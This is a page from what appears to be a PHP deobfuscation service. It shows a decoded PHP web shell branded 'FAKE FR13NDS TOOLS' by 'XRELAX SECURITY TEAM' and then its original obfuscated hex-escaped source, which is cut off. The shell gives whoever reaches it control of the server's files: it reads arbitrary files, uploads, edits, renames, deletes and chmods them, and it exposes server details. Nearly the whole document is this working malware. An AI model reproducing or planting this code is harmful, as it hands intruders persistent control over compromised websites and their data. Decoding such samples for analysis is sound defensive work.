Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto y1SNe; ko8ji: if (isset($_GET["\x66\151\x6c\x65\x73\162\x63"])) { echo "\x3c\..

Decoded Output download

<?php 
 goto y1SNe; ko8ji: if (isset($_GET["filesrc"])) { echo "<tr><td>files >> "; echo $_GET["filesrc"]; echo "</tr></td></table><br />"; echo " <textarea  style="font-size: 8px; border: 1px solid white; background-color:white; color: black; width: 100%;height: 1200px;" readonly> " . htmlspecialchars(file_get_contents($_GET["filesrc"])) . "</textarea>"; } elseif (isset($_GET["option"]) && $_POST["opt"] != "delete") { echo "</table><br /><center>" . $_POST["path"] . "<br /><br />"; if ($_POST["opt"] == "chmod") { if (isset($_POST["perm"])) { if (chmod($_POST["path"], $_POST["perm"])) { echo "<br><br><font color="lime">CHANGE PERMISSION SUCCESS !!</font><br/>"; } else { echo "<script>alert("Change Permission Gagal !!")</script>"; } } echo "<form method="POST">
Permission : <input name="perm" type="text" size="4" value="" . substr(sprintf("%o", fileperms($_POST["path"])), -4) . "" style="width:80px; height: 30px;"/>\xa<input type="hidden" name="path" value="" . $_POST["path"] . "">\xa<input type="hidden" name="opt" value="chmod">
<input type="submit" value="Lanjut" style="width:60px; height: 30px;"/>
</form>"; } elseif ($_GET["opt"] == "btw") { $cwd = getcwd(); echo "<form action="?option&path=" . $cwd . "&opt=delete&type=buat" method="POST">\xaNew Name : <input name="name" type="text" size="25" value="Folder" style="width:300px; height: 30px;"/>
<input type="hidden" name="path" value="" . $cwd . "">
<input type="hidden" name="opt" value="delete">
<input type="submit" value="Go" style="width:100px; height: 30px;"/>
</form>"; } elseif ($_POST["opt"] == "rename") { if (isset($_POST["newname"])) { if (rename($_POST["path"], $path . "/" . $_POST["newname"])) { echo "<br><br><font color="lime">CHANGE NAME SUCCESS !!</font><br/>"; } else { echo "<script>alert("Change Name Gagal !!")</script>"; } $_POST["name"] = $_POST["newname"]; } echo "<form method="POST">
New Name : <input name="newname" type="text" size="5" style="width:20%; height:30px;" value="" . $_POST["name"] . "" />
<input type="hidden" name="path" value="" . $_POST["path"] . "">\xa<input type="hidden" name="opt" value="rename">
<input type="submit" value="Lanjut" style="height:30px;" />
</form>"; } elseif ($_POST["opt"] == "edit") { if (isset($_POST["src"])) { $fp = fopen($_POST["path"], "w"); if (fwrite($fp, $_POST["src"])) { echo "<br><br><font color="lime">EDIT FILE SUCCESS !!</font><br/>"; } else { echo "<script>alert("Edit File Gagal !!")</script>"; } fclose($fp); } echo "<form method="POST">
<textarea cols=80 rows=20 name="src" style="font-size: 8px; border: 1px solid white; background-color: white; color: black; width: 100%;height: 1000px;">" . htmlspecialchars(file_get_contents($_POST["path"])) . "</textarea><br />
<input type="hidden" name="path" value="" . $_POST["path"] . "">\xa<input type="hidden" name="opt" value="edit">
<input type="submit" value="Lanjut" style="height:30px; width:70px;"/>\xa</form>"; } echo "</center>"; } else { echo "</table><br /><center>"; if (isset($_GET["option"]) && $_POST["opt"] == "delete") { if ($_POST["type"] == "dir") { if (rmdir($_POST["path"])) { echo "<br><br><font color="lime">DELETE DIR SUCCESS !!</font><br/>"; } else { echo "<script>alert("Delete Dir Gagal !!")</script>>"; } } elseif ($_POST["type"] == "file") { if (unlink($_POST["path"])) { echo "<br><br><font color="lime">DELETE FILE SUCCESS !!</font><br/>"; } else { echo "<script>alert("Delete File Gagal !!")</script>"; } } } echo "</center>"; $scandir = scandir($path); $pa = getcwd(); echo "<div id="content"><table width="95%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
<tr class="first">\xa<th><center>Name</center></th>\xa<th><center>Size</center></th>\xa<th><center>Perm</center></th>\xa<th><center>Options</center></th>\xa</tr>
<tr>"; foreach ($scandir as $dir) { if (!is_dir("{$path}/{$dir}") || $dir == "." || $dir == "..") { continue; } echo "<tr>\xa<td class=td_home><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='><a href="?path={$path}/{$dir}"> {$dir}</a></td>
<td class=td_home><center>DIR</center></td>\xa<td class=td_home><center>"; if (is_writable("{$path}/{$dir}")) { echo "<font color="#00FFFF">"; } elseif (!is_readable("{$path}/{$dir}")) { echo "<font color="#FF0004">"; } echo perms("{$path}/{$dir}"); if (is_writable("{$path}/{$dir}") || !is_readable("{$path}/{$dir}")) { echo "</font>"; } echo "</center></td>\xa<td class=td_home><center><form method="POST" action="?option&path={$path}">\xa<select name="opt" style="margin-top:6px;width:100px;font-family:Kelly Slab;font-size:15;background:black;color:lime;border:2px solid lime;border-radius:5px">\xa<option value="Action">Action</option>\xa<option value="delete">Delete</option>\xa<option value="chmod">Chmod</option>
<option value="rename">Rename</option>
</select>
<input type="hidden" name="type" value="dir">\xa<input type="hidden" name="name" value="{$dir}">\xa<input type="hidden" name="path" value="{$path}/{$dir}">\xa<input type="submit" value=">" style="margin-top:6px;width:27;font-family:Kelly Slab;font-size:15;background:black;color:lime;border:2px solid lime;border-radius:5px"/>\xa</form></center></td>\xa</tr>"; } echo "<tr class="first"><td></td><td></td><td></td><td></td></tr>"; foreach ($scandir as $file) { if (!is_file("{$path}/{$file}")) { continue; } $size = filesize("{$path}/{$file}") / 1024; $size = round($size, 3); if ($size >= 1024) { $size = round($size / 1024, 2) . " MB"; } else { $size = $size . " KB"; } echo "<tr>\xa<td class=td_home><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href="?filesrc={$path}/{$file}&path={$path}"> {$file}</a></td>\xa<td class=td_home><center>" . $size . "</center></td>
<td class=td_home><center>"; if (is_writable("{$path}/{$file}")) { echo "<font color="#8000FF">"; } elseif (!is_readable("{$path}/{$file}")) { echo "<font color="#FF0004">"; } echo perms("{$path}/{$file}"); if (is_writable("{$path}/{$file}") || !is_readable("{$path}/{$file}")) { echo "</font>"; } echo "</center></td>
<td class=td_home><center><form method="POST" action="?option&path={$path}">\xa<select name="opt" style="margin-top:6px;width:100px;font-family:Kelly Slab;font-size:15;background:white;color:lime;border:2px solid lime;border-radius:5px">\xa<option value="Action">Action</option>\xa<option value="delete">Delete</option>\xa<option value="edit">Edit</option>
<option value="rename">Rename</option>
<option value="chmod">Chmod</option>
</select>\xa<input type="hidden" name="type" value="file">\xa<input type="hidden" name="name" value="{$file}">\xa<input type="hidden" name="path" value="{$path}/{$file}">\xa<input type="submit" value=">" style="margin-top:6px;width:27;font-family:Kelly Slab;font-size:15;background:black;color:lime;border:2px solid lime;border-radius:5px"/>
</form></center></td>\xa</tr>"; } echo "</table>
</div>"; } goto rrxSv; Q6Hbw: echo "<tr><td><font color='white'>
<i class='fa fa-user'></i> <td>: <font color='lime'>" . $_SERVER["REMOTE_ADDR"] . "<tr><td><font color='white'>\xa<i class='fa fa-desktop'></i> <td>: <font color='lime'>" . gethostbyname($_SERVER["HTTP_HOST"]) . " / " . $_SERVER["SERVER_NAME"] . "<tr><td><font color='white'>
<i class='fa fa-hdd-o'></i> <td>: <font color='lime'>" . php_uname() . "</font></tr></td></table>"; goto xGv9F; TxsVf: $path = str_replace("\", "/", $path); goto lV0iY; XnB_2: echo "</form></td></tr>"; goto ko8ji; S8vVB: echo "<br><br><br><font color="lime"><form enctype="multipart/form-data" method="POST">\xaUpload File: <input type="file" name="file" style="color:lime;border:2px solid lime;" required/></font>\xa<input type="submit" value="UPLOAD" style="margin-top:4px;width:100px;height:27px;font-family:Kelly Slab;font-size:15;background:black;color: lime;border:2px solid lime;border-radius:5px"/>"; goto Imrqr; y1SNe: error_reporting(0); goto RtwVt; blaJS: foreach ($paths as $id => $pat) { if ($pat == '' && $id == 0) { $a = true; echo "<i class="fa fa-folder-o"></i> : <a href="?path=/">/</a>"; continue; } if ($pat == '') { continue; } echo "<a href="?path="; for ($i = 0; $i <= $id; $i++) { echo "{$paths[$i]}"; if ($i != $id) { echo "/"; } } echo "">" . $pat . "</a>/"; } goto S8vVB; rrxSv: function perms($file) { $perms = fileperms($file); if (($perms & 49152) == 49152) { $info = "s"; } elseif (($perms & 40960) == 40960) { $info = "l"; } elseif (($perms & 32768) == 32768) { $info = "-"; } elseif (($perms & 24576) == 24576) { $info = "b"; } elseif (($perms & 16384) == 16384) { $info = "d"; } elseif (($perms & 8192) == 8192) { $info = "c"; } elseif (($perms & 4096) == 4096) { $info = "p"; } else { $info = "u"; } $info .= $perms & 256 ? "r" : "-"; $info .= $perms & 128 ? "w" : "-"; $info .= $perms & 64 ? $perms & 2048 ? "s" : "x" : ($perms & 2048 ? "S" : "-"); $info .= $perms & 32 ? "r" : "-"; $info .= $perms & 16 ? "w" : "-"; $info .= $perms & 8 ? $perms & 1024 ? "s" : "x" : ($perms & 1024 ? "S" : "-"); $info .= $perms & 4 ? "r" : "-"; $info .= $perms & 2 ? "w" : "-"; $info .= $perms & 1 ? $perms & 512 ? "t" : "x" : ($perms & 512 ? "T" : "-"); return $info; } goto qeUe4; lV0iY: $paths = explode("/", $path); goto blaJS; xGv9F: echo "<table width="95%" border="0" cellpadding="0" cellspacing="0" align="center">\xa<tr align="center"><td align="center"><br>"; goto u6WEm; u6WEm: if (isset($_GET["path"])) { $path = $_GET["path"]; } else { $path = getcwd(); } goto TxsVf; Imrqr: if (isset($_FILES["file"])) { if (copy($_FILES["file"]["tmp_name"], $path . "/" . $_FILES["file"]["name"])) { echo "<br><br><font color="lime">UPLOAD SUCCES !!!!</font><br/>"; } else { echo "<script>alert("File Gagal Diupload !!")</script>"; } } goto XnB_2; RtwVt: session_start(); goto R7StG; R7StG: if (get_magic_quotes_gpc()) { foreach ($_POST as $key => $value) { $_POST[$key] = stripslashes($value); } } goto xQ_gH; xQ_gH: echo "<!DOCTYPE HTML>\xa <h1>FAKE FR13NDS TOOLS</h1>
<br><font color="lime">PRIV8</font><br/>\xa<br><font color="lime">XRELAX SECURITY TEAM !!</font><br/>\xa<link href="https://fonts.googleapis.com/css?family=Kelly+Slab" rel="stylesheet" type="text/css">\xa<link href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" type="text/css"/>\xa<center>\xa<style type="text/css">
body {\xa	font-family: Kelly Slab;
	background-color: #00008B;\xa\x9color: #00FFFF;
\x9}
#content tr:hover{\xa\x9background-color: #00FFFF;
	text-shadow:0px 0px 10px #000000;\xa	}
#content .first{\xa\x9color: #000000;
	background-image:url(#);\xa	}\xa#content .first:hover{\xa\x9background-color: grey;
	text-shadow:0px 0px 1px #339900;
\x9}\xatable, th, td {
\x9	border-collapse:collapse;
	\x9padding: 5px;\xa\x9	color: lime;
\x9	}
.table_home, .th_home, .td_home { \xa\x9\x9color: lime;
	\x9border: 2px solid grey;
\x9\x9padding: 7px;
	\x9}
a{\xa\x9font-size: 19px;\xa	color: #00ff00;
	text-decoration: none;
	}
a:hover{
\x9color: white;
\x9text-shadow:0px 0px 10px #339900;
	}
input,select,textarea{\xa\x9border: 1px #ffffff solid;
	-moz-border-radius: 5px;
	-webkit-border-radius:5px;
\x9border-radius:5px;\xa\x9}
.close {
	overflow: auto;\xa\x9border: 1px solid lime;
	background: lime;\xa	color: white;\xa	}
.r {
	float: right;
	text-align: right;
	}
</style>\xa
<BODY>
\xa<table width="95%" border="0" cellpadding="0" cellspacing="0" align="left">\xa<tr><td>"; goto Q6Hbw; qeUe4:  
 ?>

Did this file decode correctly?

Original Code

<?php
 goto y1SNe; ko8ji: if (isset($_GET["\x66\151\x6c\x65\x73\162\x63"])) { echo "\x3c\x74\162\76\x3c\x74\144\x3e\x66\151\x6c\x65\163\x20\x3e\76\x20"; echo $_GET["\x66\151\x6c\x65\x73\x72\143"]; echo "\74\57\x74\x72\x3e\74\x2f\x74\144\76\74\57\164\141\142\x6c\x65\x3e\x3c\142\162\40\57\x3e"; echo "\40\74\x74\x65\170\x74\141\162\145\141\40\x20\x73\x74\171\x6c\145\75\42\x66\157\156\164\x2d\163\x69\172\x65\72\x20\70\x70\x78\73\40\x62\157\x72\x64\145\x72\x3a\40\61\160\170\40\x73\x6f\x6c\151\144\x20\167\x68\151\164\145\x3b\x20\142\141\x63\x6b\147\x72\x6f\165\x6e\x64\55\x63\157\x6c\157\162\72\x77\150\151\x74\x65\x3b\40\143\157\154\157\x72\72\x20\x62\154\x61\x63\153\x3b\40\x77\151\x64\x74\x68\x3a\40\61\x30\x30\x25\x3b\x68\x65\151\147\x68\164\72\x20\61\x32\60\60\x70\x78\73\x22\x20\x72\145\x61\144\157\156\x6c\x79\x3e\40" . htmlspecialchars(file_get_contents($_GET["\146\x69\x6c\145\163\162\x63"])) . "\x3c\57\x74\x65\x78\164\141\162\145\x61\76"; } elseif (isset($_GET["\x6f\160\164\x69\x6f\156"]) && $_POST["\157\160\x74"] != "\144\x65\x6c\x65\164\145") { echo "\x3c\x2f\x74\141\x62\x6c\x65\x3e\x3c\142\162\40\57\x3e\74\x63\x65\x6e\164\x65\x72\x3e" . $_POST["\x70\141\164\x68"] . "\x3c\x62\x72\x20\x2f\x3e\x3c\x62\x72\x20\57\x3e"; if ($_POST["\157\160\164"] == "\x63\x68\155\157\x64") { if (isset($_POST["\160\x65\162\155"])) { if (chmod($_POST["\x70\x61\164\150"], $_POST["\160\x65\162\155"])) { echo "\74\x62\162\x3e\x3c\x62\162\x3e\x3c\146\x6f\156\164\x20\143\x6f\x6c\x6f\162\x3d\x22\x6c\151\155\145\x22\x3e\x43\110\x41\x4e\107\105\x20\x50\105\x52\115\x49\x53\x53\x49\x4f\x4e\x20\x53\125\x43\x43\105\x53\123\x20\41\x21\x3c\57\x66\157\x6e\164\76\x3c\x62\162\57\x3e"; } else { echo "\x3c\163\x63\162\x69\x70\164\x3e\x61\x6c\x65\162\164\50\42\x43\x68\x61\x6e\147\145\x20\120\x65\162\155\x69\x73\x73\151\157\156\40\x47\141\x67\141\154\x20\x21\x21\x22\51\x3c\57\x73\143\x72\x69\x70\x74\x3e"; } } echo "\74\146\x6f\162\155\x20\x6d\x65\164\150\x6f\144\75\x22\x50\117\x53\x54\x22\x3e\12\x50\145\x72\x6d\x69\x73\163\x69\x6f\156\x20\72\40\74\x69\156\x70\165\x74\x20\156\141\155\x65\75\x22\x70\145\162\155\x22\x20\x74\x79\160\145\x3d\x22\x74\145\170\x74\42\40\x73\151\172\145\x3d\x22\x34\x22\40\166\141\x6c\165\x65\x3d\x22" . substr(sprintf("\45\157", fileperms($_POST["\x70\141\x74\x68"])), -4) . "\x22\40\163\x74\171\x6c\145\75\x22\x77\x69\x64\164\x68\x3a\70\x30\x70\170\73\x20\x68\x65\x69\147\x68\164\72\x20\x33\x30\160\170\73\x22\x2f\x3e\xa\74\x69\x6e\160\165\164\x20\164\171\160\145\75\x22\x68\151\144\x64\x65\x6e\x22\40\156\x61\155\x65\75\42\160\141\164\150\x22\40\x76\141\154\165\145\75\42" . $_POST["\x70\x61\x74\150"] . "\x22\76\xa\74\151\x6e\x70\x75\164\x20\164\171\160\x65\75\42\150\x69\144\144\x65\x6e\42\40\x6e\141\x6d\145\x3d\x22\x6f\x70\164\42\x20\x76\141\154\165\145\x3d\x22\143\150\155\x6f\x64\42\76\12\74\x69\156\x70\x75\x74\x20\x74\171\x70\x65\75\42\x73\x75\x62\155\x69\x74\x22\x20\166\x61\x6c\165\x65\x3d\42\114\x61\x6e\152\165\164\x22\x20\x73\164\x79\x6c\x65\x3d\x22\x77\151\144\164\x68\72\66\60\160\x78\73\x20\150\x65\151\x67\150\x74\x3a\x20\x33\x30\x70\x78\73\x22\57\x3e\12\74\57\146\x6f\162\155\76"; } elseif ($_GET["\157\160\x74"] == "\142\164\x77") { $cwd = getcwd(); echo "\74\x66\157\x72\x6d\40\x61\143\164\x69\x6f\156\75\x22\77\x6f\160\164\151\157\x6e\46\x70\x61\x74\x68\x3d" . $cwd . "\x26\x6f\x70\164\x3d\144\x65\x6c\x65\x74\x65\x26\164\x79\160\x65\x3d\142\x75\x61\x74\x22\40\155\x65\x74\150\x6f\x64\75\42\x50\x4f\123\x54\x22\76\xa\116\145\x77\x20\x4e\x61\155\145\x20\x3a\40\x3c\x69\x6e\160\165\164\x20\x6e\x61\155\x65\75\42\x6e\141\x6d\145\x22\x20\x74\171\160\145\x3d\x22\x74\x65\170\x74\x22\40\x73\151\172\145\x3d\42\62\65\42\x20\x76\141\x6c\x75\x65\75\x22\106\x6f\x6c\144\x65\162\x22\40\163\164\171\x6c\145\75\x22\167\x69\144\164\150\72\63\x30\60\160\x78\73\x20\150\x65\151\x67\150\164\x3a\40\x33\60\x70\170\x3b\42\x2f\x3e\12\x3c\x69\156\x70\x75\x74\x20\x74\171\x70\145\75\x22\x68\151\x64\x64\145\156\x22\40\156\141\155\145\x3d\42\x70\x61\x74\x68\42\x20\x76\x61\154\165\145\x3d\x22" . $cwd . "\42\76\12\x3c\151\x6e\x70\x75\164\40\x74\171\x70\145\75\42\x68\151\144\144\x65\x6e\42\x20\x6e\141\x6d\x65\x3d\x22\157\x70\x74\42\40\x76\x61\154\165\x65\x3d\x22\144\145\x6c\x65\x74\145\x22\x3e\12\x3c\x69\x6e\x70\x75\164\40\x74\171\x70\x65\x3d\42\163\x75\x62\155\151\x74\x22\40\x76\x61\154\165\145\75\x22\107\x6f\42\40\x73\x74\171\154\145\x3d\42\167\151\144\164\150\x3a\x31\60\x30\x70\x78\x3b\x20\150\145\x69\x67\x68\x74\x3a\x20\63\x30\x70\170\x3b\x22\x2f\x3e\12\x3c\57\x66\x6f\x72\155\x3e"; } elseif ($_POST["\157\x70\164"] == "\x72\x65\156\x61\x6d\x65") { if (isset($_POST["\156\145\167\156\141\x6d\145"])) { if (rename($_POST["\160\x61\164\150"], $path . "\57" . $_POST["\156\145\x77\x6e\141\155\x65"])) { echo "\74\x62\162\x3e\74\x62\162\76\74\x66\x6f\x6e\x74\40\143\157\154\157\x72\x3d\42\x6c\151\155\x65\42\x3e\x43\110\x41\116\x47\105\40\116\x41\115\x45\x20\123\x55\x43\103\x45\123\123\40\41\x21\74\x2f\x66\x6f\156\x74\x3e\x3c\142\x72\x2f\x3e"; } else { echo "\74\x73\x63\x72\151\x70\164\76\141\x6c\x65\162\164\50\42\x43\150\x61\156\x67\x65\x20\x4e\141\155\145\40\x47\x61\x67\141\154\40\41\41\x22\x29\x3c\x2f\163\x63\x72\151\160\x74\76"; } $_POST["\x6e\141\155\145"] = $_POST["\156\x65\x77\156\x61\155\x65"]; } echo "\74\146\157\x72\155\40\155\x65\164\x68\157\144\x3d\x22\120\117\123\124\42\x3e\12\x4e\145\167\x20\116\x61\155\x65\40\x3a\x20\74\151\156\160\165\164\40\156\x61\155\x65\x3d\42\156\x65\x77\156\x61\x6d\x65\42\x20\x74\171\x70\145\75\42\x74\x65\x78\164\x22\x20\163\151\172\x65\x3d\42\65\42\x20\x73\x74\171\x6c\x65\x3d\42\x77\151\x64\x74\150\x3a\x32\60\45\x3b\x20\150\145\151\147\150\164\72\63\x30\x70\x78\73\42\x20\166\141\x6c\x75\x65\75\42" . $_POST["\156\141\155\x65"] . "\x22\x20\x2f\76\12\74\151\x6e\x70\x75\x74\40\164\171\160\145\75\x22\x68\x69\x64\144\x65\156\42\40\x6e\141\x6d\x65\x3d\42\160\x61\x74\x68\x22\x20\x76\x61\x6c\x75\x65\75\x22" . $_POST["\x70\141\164\x68"] . "\x22\x3e\xa\74\151\156\x70\165\164\40\164\171\160\x65\75\42\150\151\x64\x64\x65\x6e\x22\40\x6e\141\x6d\145\x3d\x22\157\160\x74\x22\x20\x76\141\x6c\165\x65\75\x22\x72\145\156\141\x6d\145\42\x3e\12\x3c\x69\x6e\160\x75\164\40\x74\x79\160\145\75\42\163\165\142\155\151\x74\42\x20\x76\141\154\165\x65\75\42\x4c\x61\156\152\x75\164\x22\40\x73\164\171\x6c\x65\75\x22\x68\x65\151\x67\150\x74\x3a\63\60\x70\x78\x3b\x22\x20\x2f\76\12\74\x2f\146\x6f\x72\155\x3e"; } elseif ($_POST["\x6f\160\164"] == "\x65\x64\151\x74") { if (isset($_POST["\163\162\x63"])) { $fp = fopen($_POST["\160\x61\164\150"], "\167"); if (fwrite($fp, $_POST["\163\162\143"])) { echo "\74\142\162\x3e\x3c\142\162\76\x3c\146\x6f\x6e\164\40\143\157\x6c\x6f\162\75\x22\154\151\x6d\145\x22\x3e\x45\104\111\x54\x20\106\111\114\x45\x20\x53\x55\103\103\105\x53\123\40\41\41\74\57\146\157\x6e\164\x3e\74\x62\x72\x2f\76"; } else { echo "\74\163\143\x72\x69\x70\164\x3e\x61\x6c\145\162\x74\50\x22\x45\144\151\164\x20\106\151\154\x65\x20\x47\141\x67\141\x6c\40\41\41\42\51\74\57\163\x63\162\151\x70\x74\76"; } fclose($fp); } echo "\74\146\x6f\x72\x6d\40\x6d\x65\164\x68\157\x64\75\42\120\x4f\x53\124\x22\76\12\74\164\x65\x78\164\141\x72\145\141\40\143\x6f\154\x73\x3d\x38\60\40\x72\x6f\167\163\75\62\60\x20\156\x61\155\145\75\x22\163\162\143\42\40\163\164\171\x6c\145\x3d\x22\146\x6f\156\x74\x2d\163\x69\x7a\x65\72\x20\70\x70\x78\x3b\40\x62\x6f\162\x64\x65\162\72\x20\x31\160\170\40\x73\157\x6c\x69\x64\x20\x77\x68\x69\x74\x65\x3b\x20\142\141\x63\153\x67\x72\x6f\165\x6e\144\55\x63\157\154\157\162\x3a\x20\x77\150\151\x74\145\73\x20\x63\x6f\x6c\x6f\x72\x3a\40\x62\x6c\141\143\x6b\x3b\40\x77\x69\x64\164\150\x3a\40\61\x30\60\x25\73\150\x65\x69\x67\x68\164\72\x20\61\60\x30\60\160\170\73\42\x3e" . htmlspecialchars(file_get_contents($_POST["\160\141\164\x68"])) . "\74\57\x74\145\x78\x74\x61\162\x65\141\76\74\x62\162\x20\x2f\x3e\12\74\151\156\160\x75\x74\40\x74\171\160\145\75\42\150\x69\144\144\x65\x6e\42\x20\156\x61\x6d\145\x3d\x22\160\x61\x74\x68\x22\x20\x76\141\x6c\x75\145\75\x22" . $_POST["\160\x61\x74\150"] . "\42\76\xa\x3c\x69\x6e\160\165\164\x20\164\171\160\145\x3d\x22\x68\151\x64\144\x65\x6e\x22\40\156\141\x6d\145\x3d\x22\157\x70\164\42\x20\x76\x61\x6c\165\x65\x3d\x22\x65\x64\151\x74\x22\x3e\12\x3c\x69\x6e\x70\x75\164\x20\x74\x79\160\145\75\x22\163\x75\x62\x6d\x69\x74\x22\40\166\x61\154\165\145\75\x22\114\141\x6e\x6a\165\164\x22\40\163\164\x79\x6c\145\75\x22\x68\x65\151\147\150\164\x3a\63\x30\x70\x78\x3b\40\x77\x69\144\164\150\72\x37\60\160\x78\73\x22\x2f\76\xa\x3c\x2f\146\157\x72\x6d\x3e"; } echo "\x3c\57\143\145\x6e\164\145\x72\76"; } else { echo "\x3c\57\164\x61\142\x6c\x65\76\x3c\142\x72\40\x2f\76\74\143\x65\156\164\145\x72\x3e"; if (isset($_GET["\157\x70\164\x69\x6f\x6e"]) && $_POST["\157\x70\x74"] == "\x64\x65\154\145\x74\145") { if ($_POST["\164\x79\160\x65"] == "\x64\x69\162") { if (rmdir($_POST["\x70\x61\164\150"])) { echo "\x3c\x62\162\76\x3c\142\x72\76\x3c\x66\157\x6e\x74\x20\x63\157\x6c\x6f\x72\75\42\154\151\155\145\x22\76\x44\105\114\x45\x54\x45\x20\x44\111\122\40\x53\125\x43\x43\x45\x53\123\40\x21\x21\74\57\x66\157\x6e\164\76\74\142\x72\x2f\76"; } else { echo "\x3c\163\143\162\151\160\164\x3e\x61\x6c\145\162\164\x28\42\104\145\154\145\x74\x65\x20\104\151\x72\x20\x47\x61\x67\141\154\40\x21\x21\42\51\x3c\57\163\143\x72\x69\160\164\x3e\x3e"; } } elseif ($_POST["\164\x79\x70\145"] == "\x66\x69\x6c\145") { if (unlink($_POST["\x70\141\164\x68"])) { echo "\x3c\x62\x72\76\x3c\x62\162\x3e\x3c\x66\x6f\x6e\164\40\x63\157\154\x6f\x72\75\42\154\151\x6d\145\42\76\x44\105\114\105\124\x45\40\x46\x49\x4c\x45\x20\123\x55\x43\103\x45\123\x53\x20\x21\x21\74\57\x66\157\x6e\x74\x3e\74\x62\x72\x2f\76"; } else { echo "\74\163\143\x72\x69\160\164\x3e\141\154\x65\x72\x74\x28\42\104\145\154\x65\164\x65\x20\106\x69\x6c\145\x20\107\x61\147\141\x6c\x20\x21\41\x22\51\x3c\57\163\x63\162\x69\160\x74\76"; } } } echo "\x3c\57\x63\145\x6e\x74\x65\x72\76"; $scandir = scandir($path); $pa = getcwd(); echo "\74\x64\151\166\40\x69\144\75\42\143\x6f\x6e\x74\145\x6e\x74\42\x3e\x3c\x74\141\x62\154\145\x20\167\151\x64\x74\150\x3d\42\x39\65\x25\x22\x20\x63\154\141\163\x73\75\42\x74\141\x62\154\x65\x5f\x68\x6f\x6d\145\42\x20\x62\x6f\162\144\x65\x72\x3d\x22\60\42\40\143\x65\x6c\x6c\160\141\144\x64\151\x6e\x67\75\x22\63\42\40\x63\145\x6c\x6c\163\x70\141\143\x69\x6e\147\x3d\42\x31\42\x20\141\154\151\x67\x6e\75\x22\x63\x65\156\x74\x65\162\42\x3e\12\74\x74\x72\40\143\x6c\x61\x73\163\75\42\x66\151\x72\x73\x74\x22\76\xa\x3c\x74\x68\76\74\x63\145\x6e\164\x65\162\76\116\141\x6d\x65\x3c\x2f\143\x65\x6e\x74\145\162\x3e\x3c\x2f\164\150\76\xa\74\x74\x68\x3e\x3c\x63\145\156\164\145\162\x3e\123\x69\x7a\x65\x3c\57\143\x65\156\x74\x65\x72\x3e\74\x2f\x74\x68\x3e\xa\74\164\150\76\x3c\143\145\x6e\164\145\162\x3e\120\145\162\x6d\x3c\x2f\x63\145\x6e\164\145\x72\76\x3c\57\164\x68\x3e\xa\x3c\x74\x68\76\x3c\143\x65\156\x74\x65\162\x3e\x4f\160\164\151\157\156\x73\74\x2f\x63\145\156\164\145\x72\x3e\74\57\x74\150\76\xa\74\x2f\164\x72\76\12\x3c\x74\162\76"; foreach ($scandir as $dir) { if (!is_dir("{$path}\x2f{$dir}") || $dir == "\x2e" || $dir == "\56\x2e") { continue; } echo "\74\164\x72\76\xa\x3c\x74\144\x20\143\x6c\x61\x73\x73\75\x74\144\x5f\150\x6f\155\145\x3e\74\x69\155\147\x20\x73\162\143\x3d\x27\x64\141\x74\x61\x3a\151\155\x61\147\x65\x2f\160\156\x67\x3b\142\x61\x73\x65\66\64\x2c\x52\60\x6c\107\x4f\x44\x6c\150\105\x77\101\121\101\x4c\x4d\101\101\x41\x41\101\x41\120\57\57\x2f\x35\x79\143\101\115\x37\x4f\x59\57\x2f\57\x6e\120\x2f\57\x7a\166\x2f\117\x6e\x50\146\63\x39\x2f\57\57\57\167\x41\101\101\x41\101\x41\x41\101\x41\101\101\101\x41\x41\x41\x41\101\x41\101\x41\101\101\x41\101\x41\101\x41\x43\x48\65\102\x41\105\x41\101\101\147\x41\114\101\101\x41\101\101\x41\124\x41\x42\101\101\x41\x41\122\122\105\115\x6c\112\161\67\60\64\x36\171\x70\x36\102\170\163\x69\x48\105\126\x42\x45\x41\113\x59\103\125\120\x72\104\x70\67\x48\154\130\122\144\105\157\x4d\161\x43\x65\142\x70\x2f\x34\x59\143\150\x66\x66\172\x47\121\x68\x48\64\x59\122\x59\x50\102\x32\x44\117\154\110\120\x69\113\167\161\144\x31\120\x71\x38\171\x72\x56\x56\147\63\x51\x59\x65\x48\x35\x52\x59\x4b\x35\162\112\146\141\x46\125\x55\101\x33\166\102\64\146\x42\x49\x42\x41\104\x73\75\47\76\x3c\141\40\x68\162\x65\146\75\42\77\160\141\x74\150\75{$path}\57{$dir}